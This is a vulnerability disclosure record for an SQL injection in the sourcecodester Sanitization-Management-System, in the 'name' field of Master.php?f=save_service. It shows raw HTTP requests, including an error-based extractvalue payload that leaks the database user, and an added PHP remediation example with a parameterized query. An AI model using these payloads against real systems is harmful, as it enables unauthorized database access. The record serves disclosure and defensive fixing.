Submit #50579: sourcecodester Sanitization-Management-System SQL injection

Title sourcecodester Sanitization-Management-System SQL injection
Description A vulnerability classified as critical has been discovered in SMS. This affects an unknown part of the file Master.php. Manipulation on parameter ID results in SQL injection.

#1, visit cms
#2, Use burp to grab request packets
#3, I found that there is SQL injection in name="id" in the form submitted by path /php-sms/classes/Master.php?f=save

quote request and return packets

-----------------------------------------------------------------------------------
POST /php-sms/classes/Master.php?f=save_service HTTP/1.1
Host: localhost
sec-ch-ua: "Chromium";v="100"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarycKqminYBwcgy9RHs
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept-Language: en-US
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/php-sms/admin/?page=services/manage_service
Connection: keep-alive
Cookie: PHPSESSID=u16ltkbk2uotkvrd3duoo0h1rj
Content-Length: 718

------WebKitFormBoundarycKqminYBwcgy9RHs
Content-Disposition: form-data; name="id"

------WebKitFormBoundarycKqminYBwcgy9RHs
Content-Disposition: form-data; name="name"

1'
------WebKitFormBoundarycKqminYBwcgy9RHs
Content-Disposition: form-data; name="description"

555
------WebKitFormBoundarycKqminYBwcgy9RHs
Content-Disposition: form-data; name="files"; filename="image.jpg"
Content-Type: image/jpeg

1
------WebKitFormBoundarycKqminYBwcgy9RHs
Content-Disposition: form-data; name="status"

0
------WebKitFormBoundarycKqminYBwcgy9RHs
Content-Disposition: form-data; name="img"; filename="zip.zip"
Content-Type: application/x-zip-compressed

1
------WebKitFormBoundarycKqminYBwcgy9RHs--
-----------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Wed, 02 Nov 2022 09:11:32 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
X-Powered-By: PHP/7.4.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 349

<br />
<b>Notice</b>: Trying to get property 'num_rows' of non-object in <b>E:\phpstudy_pro\WWW\php-sms\classes\Master.php</b> on line <b>48</b><br />
{"status":"failed","error":"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and delete_flag = 0' at line 1"}
-----------------------------------------------------------------------------------
POST /php-sms/classes/Master.php?f=save_service HTTP/1.1
Host: localhost
sec-ch-ua: "Chromium";v="100"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarycKqminYBwcgy9RHs
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept-Language: en-US
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/php-sms/admin/?page=services/manage_service
Connection: keep-alive
Cookie: PHPSESSID=u16ltkbk2uotkvrd3duoo0h1rj
Content-Length: 778

------WebKitFormBoundarycKqminYBwcgy9RHs
Content-Disposition: form-data; name="id"

------WebKitFormBoundarycKqminYBwcgy9RHs
Content-Disposition: form-data; name="name"

1' and (extractvalue(1,concat(0x7e,(select user()),0x7e))); -- 
------WebKitFormBoundarycKqminYBwcgy9RHs
Content-Disposition: form-data; name="description"

555
------WebKitFormBoundarycKqminYBwcgy9RHs
Content-Disposition: form-data; name="files"; filename="image.jpg"
Content-Type: image/jpeg

1
------WebKitFormBoundarycKqminYBwcgy9RHs
Content-Disposition: form-data; name="status"

0
------WebKitFormBoundarycKqminYBwcgy9RHs
Content-Disposition: form-data; name="img"; filename="zip.zip"
Content-Type: application/x-zip-compressed

1
------WebKitFormBoundarycKqminYBwcgy9RHs--
-----------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Wed, 02 Nov 2022 09:15:07 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
X-Powered-By: PHP/7.4.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 220

<br />
<b>Notice</b>: Trying to get property 'num_rows' of non-object in <b>E:\phpstudy_pro\WWW\php-sms\classes\Master.php</b> on line <b>48</b><br />
{"status":"failed","error":"XPATH syntax error: '~root@localhost~'"}
Source https://github.com/x9AD8/Sanitization-Management-System/blob/main/README.md
User uchihashow (ID 34954)
Submission 2022-11-02 10:30 (2 years ago)
Moderation 2022-11-05 09:46 (3 days later)
Status Accepted
VulDB Entry 213012
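
An added remediation example, not code from Master.php or from the submission: a duplicate-name check written with string concatenation and raw error echo, next to a parameterized version that logs the database error server-side. The table name `service_list`, its columns, and both function names are assumptions; the query shape is inferred only from the `and delete_flag = 0` fragment in the captured error text.

```php
<?php
// Added example, not the project's code. Assumed names: table `service_list`
// with columns `id`, `name`, `delete_flag`; both function names are hypothetical.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // failures throw on any PHP version

// Weak pattern: the request value is concatenated into the statement, and the
// raw driver message is returned to the client, as in the captured responses.
function name_exists_unsafe(mysqli $conn, string $name): string
{
    $sql = "SELECT id FROM service_list WHERE name = '{$name}' AND delete_flag = 0";
    try {
        $res = $conn->query($sql);
        return json_encode(['status' => 'success', 'exists' => $res->num_rows > 0]);
    } catch (mysqli_sql_exception $e) {
        // Echoing the driver message gives the client an error-based data channel.
        return json_encode(['status' => 'failed', 'error' => $e->getMessage()]);
    }
}

// Corrected pattern: placeholders keep the value out of the SQL grammar, the
// id is forced to an integer, and error detail goes to the server log only.
function name_exists_safe(mysqli $conn, string $name, string $rawId = ''): string
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT);
    $id = ($id === false) ? 0 : $id; // empty or non-numeric id means "new record"
    try {
        $stmt = $conn->prepare(
            'SELECT id FROM service_list WHERE name = ? AND delete_flag = 0 AND id <> ?'
        );
        $stmt->bind_param('si', $name, $id);
        $stmt->execute();
        $stmt->store_result();
        $exists = $stmt->num_rows > 0;
        $stmt->close();
        return json_encode(['status' => 'success', 'exists' => $exists]);
    } catch (mysqli_sql_exception $e) {
        error_log('service duplicate check failed: ' . $e->getMessage());
        return json_encode(['status' => 'failed', 'error' => 'Internal error']);
    }
}
```

With the parameterized version, the `name` value from either captured request is compared as a literal string, so the response carries neither a syntax error nor an XPATH error.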
